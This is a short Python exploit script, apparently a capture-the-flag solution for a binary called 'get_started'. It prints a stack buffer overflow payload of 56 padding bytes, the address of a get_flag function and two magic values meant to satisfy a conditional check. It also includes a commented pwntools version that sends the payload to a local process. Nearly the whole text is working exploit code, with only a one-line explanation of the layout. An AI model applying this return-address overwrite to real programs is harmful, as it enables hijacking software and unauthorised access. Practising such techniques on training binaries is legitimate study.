import sys

sys.stdout.write("A"*56+"\xa0\x89\x04\x08"+"BBBB"+"\x4f\xd6\x8c\x30"+"\xd1\x19\x57\x19")

'''
from pwn import *


#p = remote('localhost', 1234)
exploit = ""
exploit += "A" * 56
exploit += p32(0x80489a0)
exploit += p32(4)
exploit += p32(0x308cd64f)
exploit += p32(0x195719d1)
p = process('./get_started')
p.sendline(exploit)
print "[+] sending exploit..."
print "[+] " + p.recv(1024)[26:]

exploit:
padding+get_flag function+padding+values to check conditional jump
